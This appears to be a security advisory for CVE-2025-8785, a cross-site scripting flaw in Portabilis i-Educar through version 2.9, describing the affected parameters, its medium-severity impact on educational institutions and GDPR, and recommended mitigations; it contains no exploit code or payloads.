CVE-2025-8785 is a cross-site scripting (XSS) vulnerability identified in the Portabilis i-Educar platform, versions up to 2.9. The vulnerability arises from improper handling of user-supplied input parameters, specifically nm_pessoa, matricula, and matricula_interna, within the /intranet/educar_usuario_lst.php file. An attacker can manipulate these parameters to inject malicious scripts that execute in the context of the victim's browser. This type of vulnerability allows attackers to perform actions such as session hijacking, defacement, or redirecting users to malicious sites. The vulnerability is remotely exploitable without authentication, but requires some user interaction (e.g., clicking a crafted link). The CVSS 4.0 base score is 5.1, indicating a medium severity level, reflecting the moderate impact on confidentiality and integrity with limited availability impact. The vendor has been notified but has not responded or issued a patch, and no known exploits are currently reported in the wild. The vulnerability affects all versions from 2.0 through 2.9 of i-Educar, a widely used open-source educational management system primarily deployed in educational institutions to manage student data and administrative tasks.

For European organizations, particularly educational institutions using Portabilis i-Educar, this vulnerability poses a risk to the confidentiality and integrity of user data. Successful exploitation could allow attackers to steal session cookies, impersonate users (including administrators), and potentially escalate privileges or manipulate sensitive educational records. This could lead to unauthorized access to personal student information, disruption of educational services, and reputational damage. Given the nature of the platform, the impact extends to privacy compliance risks under GDPR, as personal data could be exposed or manipulated. Although the vulnerability does not directly affect system availability, the indirect effects of data breaches or defacement could disrupt normal operations. The lack of vendor response and patch availability increases the risk exposure for organizations that have not implemented compensating controls.

Organizations should immediately implement input validation and output encoding on all user-supplied data fields, especially nm_pessoa, matricula, and matricula_interna, to neutralize malicious scripts. Web application firewalls (WAFs) should be configured to detect and block XSS attack patterns targeting these parameters. Administrators should monitor logs for unusual requests to /intranet/educar_usuario_lst.php and suspicious parameter values. User awareness training should emphasize caution when clicking on unexpected links related to the platform. If possible, organizations should consider isolating the i-Educar intranet environment or restricting access to trusted IP ranges to reduce exposure. Until an official patch is released, applying custom patches or community-developed fixes that sanitize inputs is recommended. Regular backups of critical data should be maintained to enable recovery in case of compromise. Finally, organizations should engage with the vendor or community to encourage timely patch development and share threat intelligence.